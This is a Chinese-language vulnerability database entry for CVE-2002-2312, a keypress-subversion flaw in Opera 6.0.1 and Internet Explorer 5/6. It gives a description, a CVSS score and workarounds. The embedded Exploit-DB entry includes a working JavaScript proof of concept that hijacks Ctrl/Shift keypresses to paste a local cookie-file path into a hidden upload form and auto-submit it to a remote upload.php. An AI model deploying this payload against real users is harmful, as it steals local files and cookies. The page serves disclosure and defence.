CVE-2002-2312
CVSS5.8
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:53
NMCOE    

[原文]Opera 6.0.1 allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage.


[CNNVD]多家厂商WEB浏览器JavaScript修改转换按键事件漏洞(CNNVD-200212-517)

        
        Microsoft Internet Explorer和Opera是流行的WEB浏览器。
        Microsoft Internet Explorer和Opera在处理'onkeydown'事件时存在问题,远程攻击者可以利用这个漏洞获得目标用户任何本地文件。
        通过Javascript,可以定义'onkeydown'事件的事件句柄,此事件当用户末端按某一键的时候被触发,而使用恶意代码可以转换这个事件为任意Ctrl-key按键操作的组合,包括事件转换为粘贴操作,如粘贴任意内容到文件上载表单中,造成系统敏感信息泄露。
        攻击者可以通过如下步骤进行操作:
        1)当用户按CTRL键,onkeydown事件会把按下的键转换成'V',结果可导致使用粘贴操作。
        2)剪贴板中的内容已经更改,此时如果输入焦点更改到隐藏的文件上载表单中,粘贴操作就会在表单中执行,这样就更改了文件上载字段的值。
        3)使用合法Javascript操作自动提交要上载的表单。
        由于可以通过"..\filename"引用文件,所以攻击者不需要知道本地文件的确切路径。不过如果在知道文件确切路径的情况下,存在执行任意程序的可能,如攻击者可以编译一个.chm帮助文件并通过showHelp()(老的.chm攻击)启动。
        远程攻击者可以通过构建包含恶意代码的WEB页面,并在自己的服务器上准备'upload.php'文件进行上载处理,当用户查看此页面,并按下'CTRL'键的时候,就导致WEB页面中指定的文件上载到攻击者指定的服务器中。
        

- CVSS (基础分值)

CVSS分值: 5.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2312
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2312
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-517
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5290
(UNKNOWN)  BID  5290

- 漏洞信息

多家厂商WEB浏览器JavaScript修改转换按键事件漏洞
中危 设计错误
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        
        Microsoft Internet Explorer和Opera是流行的WEB浏览器。
        Microsoft Internet Explorer和Opera在处理'onkeydown'事件时存在问题,远程攻击者可以利用这个漏洞获得目标用户任何本地文件。
        通过Javascript,可以定义'onkeydown'事件的事件句柄,此事件当用户末端按某一键的时候被触发,而使用恶意代码可以转换这个事件为任意Ctrl-key按键操作的组合,包括事件转换为粘贴操作,如粘贴任意内容到文件上载表单中,造成系统敏感信息泄露。
        攻击者可以通过如下步骤进行操作:
        1)当用户按CTRL键,onkeydown事件会把按下的键转换成'V',结果可导致使用粘贴操作。
        2)剪贴板中的内容已经更改,此时如果输入焦点更改到隐藏的文件上载表单中,粘贴操作就会在表单中执行,这样就更改了文件上载字段的值。
        3)使用合法Javascript操作自动提交要上载的表单。
        由于可以通过"..\filename"引用文件,所以攻击者不需要知道本地文件的确切路径。不过如果在知道文件确切路径的情况下,存在执行任意程序的可能,如攻击者可以编译一个.chm帮助文件并通过showHelp()(老的.chm攻击)启动。
        远程攻击者可以通过构建包含恶意代码的WEB页面,并在自己的服务器上准备'upload.php'文件进行上载处理,当用户查看此页面,并按下'CTRL'键的时候,就导致WEB页面中指定的文件上载到攻击者指定的服务器中。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * Microsoft公司对这个问题进行调查后,认为不符合安全漏洞定义,所以不准备发布补丁或者修复方案,但提供了如下临时解决方案:
        1. 设置"Submit nonencrypted form data"选项为"Disable(不启用)"或"Prompt(提示)"。
        2. 不启用"允许通过脚本进行粘贴操作(allow paste operations via script)"。
        3. 不启动活动脚本执行。
        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/windows/ie/default.asp

        Opera Software
        --------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.opera.com

- 漏洞信息 (21636)

Opera 6.0.1,MS IE 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability (EDBID:21636)
windows remote
2002-07-23 Verified
0 Andreas Sandblad
N/A [点击下载]
source: http://www.securityfocus.com/bid/5290/info

An issue has been reported with the JavaScript implementation of multiple web browsers, including Microsoft Internet Explorer and Opera. Malicious JavaScript may subvert some keypress events, with consequences including the disclosure of arbitrary local files to a remote server.

Through JavaScript, it is possible to define an event handler for the 'onkeydown' event, which fires when a key is pressed by the end user. Malicious script code may subvert this event to an arbitrary Ctrl-key combination, including events such as Paste. By further modifying the environment, it is possible to paste arbitrary content into a file upload form field.

This form may also be submitted by the malicious script, disclosing arbitrary local file contents to a remote server.

Other attacks based on script interaction with the cut and paste functionality of Windows may also be possible.

<div id=h style="zoom:0.0001">
<form name=u enctype="multipart/form-data" method=post action=upload.php>
<input type=file name=file></form></div>
<script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (event.ctrlKey)
event.keyCode = 86;
else if (event.shiftKey)
event.keyCode = 45;
else
return;
document.onkeydown = null;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
</script>		

- 漏洞信息

60233
Opera event.*Key onkeydown Event Arbitrary File Content Upload
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-07-23 Unknow
2002-07-23 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站